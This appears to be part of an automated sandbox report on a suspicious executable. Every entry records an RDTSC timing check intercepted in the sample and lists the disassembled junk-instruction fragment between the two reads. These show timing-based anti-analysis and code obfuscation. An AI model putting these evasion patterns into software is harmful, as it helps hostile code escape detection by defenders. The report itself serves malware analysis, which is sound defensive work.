Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C93ACD second address: C93AE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9F53DFD65h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CD6C41 second address: CD6C47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CD7B92 second address: CD7BA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CD7BA9 second address: CD7C38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A86h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c jmp 00007FC9F53C6A7Bh 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 pop ecx 0x00000015 nop 0x00000016 add bx, 8962h 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ebx 0x00000020 call 00007FC9F53C6A78h 0x00000025 pop ebx 0x00000026 mov dword ptr [esp+04h], ebx 0x0000002a add dword ptr [esp+04h], 00000017h 0x00000032 inc ebx 0x00000033 push ebx 0x00000034 ret 0x00000035 pop ebx 0x00000036 ret 0x00000037 sub dword ptr [ebp+122D1F24h], eax 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push ebx 0x00000042 call 00007FC9F53C6A78h 0x00000047 pop ebx 0x00000048 mov dword ptr [esp+04h], ebx 0x0000004c add dword ptr [esp+04h], 00000017h 0x00000054 inc ebx 0x00000055 push ebx 0x00000056 ret 0x00000057 pop ebx 0x00000058 ret 0x00000059 mov dword ptr [ebp+122D1BF4h], ebx 0x0000005f xchg eax, esi 0x00000060 push ebx 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007FC9F53C6A7Bh 0x00000068 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CD8E25 second address: CD8E2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CD9DD6 second address: CD9DE8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC9F53C6A76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007FC9F53C6A7Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CDBEE8 second address: CDBEEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CDBEEF second address: CDBF11 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007FC9F53C6A88h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CDBF11 second address: CDBF45 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC9F53DFD56h 0x00000008 jmp 00007FC9F53DFD5Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 jmp 00007FC9F53DFD68h 0x00000019 pop eax 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CDBF45 second address: CDBF64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A89h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CDBF64 second address: CDBF68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CDC6FA second address: CDC6FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CD6D86 second address: CD6D8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CDFE15 second address: CDFE1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C8BA79 second address: C8BA8D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC9F53DFD5Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C8BA8D second address: C8BACB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A86h 0x00000007 jmp 00007FC9F53C6A87h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jl 00007FC9F53C6A76h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C8BACB second address: C8BADC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 je 00007FC9F53DFD56h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C8BADC second address: C8BAE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CD7DBA second address: CD7DF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC9F53DFD69h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CD7DF1 second address: CD7E59 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC9F53C6A87h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov ebx, 390A91FFh 0x00000010 push dword ptr fs:[00000000h] 0x00000017 and di, F7DCh 0x0000001c movsx edi, dx 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 push eax 0x00000027 clc 0x00000028 pop edi 0x00000029 mov eax, dword ptr [ebp+122D0081h] 0x0000002f movsx edi, si 0x00000032 push FFFFFFFFh 0x00000034 mov edi, dword ptr [ebp+122D35C3h] 0x0000003a and edi, 7F268BD7h 0x00000040 nop 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FC9F53C6A84h 0x00000048 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CD7E59 second address: CD7E6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a js 00007FC9F53DFD5Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CD7E6B second address: CD7E78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jnc 00007FC9F53C6A76h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CD9F64 second address: CD9F8A instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC9F53DFD5Ch 0x00000008 jno 00007FC9F53DFD56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC9F53DFD63h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CD9F8A second address: CD9F8F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CDA02F second address: CDA039 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FC9F53DFD56h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CDA039 second address: CDA04C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007FC9F53C6A76h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CDA04C second address: CDA056 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC9F53DFD56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CDC8BB second address: CDC8BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C7C5CC second address: C7C5D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C7C5D6 second address: C7C5DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CE9823 second address: CE9827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C7E085 second address: C7E0A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FC9F53C6A84h 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CEEFD1 second address: CEF00D instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC9F53DFD56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007FC9F53DFD5Ah 0x00000014 mov eax, dword ptr [eax] 0x00000016 pushad 0x00000017 pushad 0x00000018 push esi 0x00000019 pop esi 0x0000001a push esi 0x0000001b pop esi 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FC9F53DFD68h 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CF37D5 second address: CF380A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC9F53C6A86h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC9F53C6A7Eh 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CF4128 second address: CF412C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CF42A6 second address: CF42DB instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC9F53C6A76h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007FC9F53C6A9Fh 0x00000012 jns 00007FC9F53C6A7Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c jmp 00007FC9F53C6A83h 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CF442A second address: CF4430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CF476E second address: CF4772 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CF48B2 second address: CF48B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CF48B6 second address: CF48BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CF4A29 second address: CF4A36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jp 00007FC9F53DFD56h 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CF4A36 second address: CF4A3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CFED08 second address: CFED24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD66h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CFED24 second address: CFED52 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jo 00007FC9F53C6A76h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 jmp 00007FC9F53C6A88h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C89F46 second address: C89F4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C89F4A second address: C89F50 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C89F50 second address: C89F6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC9F53DFD62h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C89F6B second address: C89F71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C89F71 second address: C89F7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FC9F53DFD56h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C89F7B second address: C89F9B instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC9F53C6A76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FC9F53C6A81h 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CFDA63 second address: CFDA67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CFDA67 second address: CFDA7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jns 00007FC9F53C6A76h 0x0000000d jns 00007FC9F53C6A76h 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CFDA7B second address: CFDA9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9F53DFD69h 0x00000009 jne 00007FC9F53DFD56h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CFDA9E second address: CFDACC instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC9F53C6A76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push edx 0x0000000e jp 00007FC9F53C6A76h 0x00000014 jmp 00007FC9F53C6A83h 0x00000019 pop edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CFDD67 second address: CFDD6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CFE2CA second address: CFE2D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CFE2D0 second address: CFE2D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CFE2D9 second address: CFE2DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CFE421 second address: CFE43D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FC9F53DFD56h 0x00000009 jnl 00007FC9F53DFD56h 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 je 00007FC9F53DFD56h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CFE43D second address: CFE441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CFE709 second address: CFE70F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CFEB4E second address: CFEB52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CFEB52 second address: CFEB74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC9F53DFD66h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CFEB74 second address: CFEB97 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC9F53C6A76h 0x00000008 jmp 00007FC9F53C6A84h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pushad 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D0346A second address: D0348F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007FC9F53DFD67h 0x0000000a pop edx 0x0000000b jp 00007FC9F53DFD5Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CC2D40 second address: CAAD13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 jnp 00007FC9F53C6A7Ch 0x0000000e mov dword ptr [ebp+122D2D89h], edi 0x00000014 call dword ptr [ebp+1245E68Ah] 0x0000001a push edi 0x0000001b jmp 00007FC9F53C6A80h 0x00000020 push ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CC35C9 second address: CC35CF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CC3C94 second address: CC3C9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FC9F53C6A76h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CC3C9E second address: CC3CA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D02791 second address: D027A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9F53C6A7Ch 0x00000009 jnl 00007FC9F53C6A76h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D027A7 second address: D027B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 ja 00007FC9F53DFD56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D02A45 second address: D02A49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D02A49 second address: D02A4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D0A5DB second address: D0A5E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jnp 00007FC9F53C6A76h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D0A5E9 second address: D0A614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jng 00007FC9F53DFD56h 0x0000000f push esi 0x00000010 pop esi 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 jmp 00007FC9F53DFD67h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D0A8E0 second address: D0A8E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D0A8E4 second address: D0A8EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D09FF5 second address: D0A009 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC9F53C6A76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jp 00007FC9F53C6A76h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D0A009 second address: D0A034 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9F53DFD64h 0x00000009 jmp 00007FC9F53DFD63h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D0A034 second address: D0A061 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A7Bh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 je 00007FC9F53C6A76h 0x0000001c push esi 0x0000001d pop esi 0x0000001e pop esi 0x0000001f jbe 00007FC9F53C6A78h 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D0A061 second address: D0A069 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D0A069 second address: D0A06D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D0AD29 second address: D0AD3E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FC9F53DFD5Ch 0x00000008 pushad 0x00000009 popad 0x0000000a pop esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
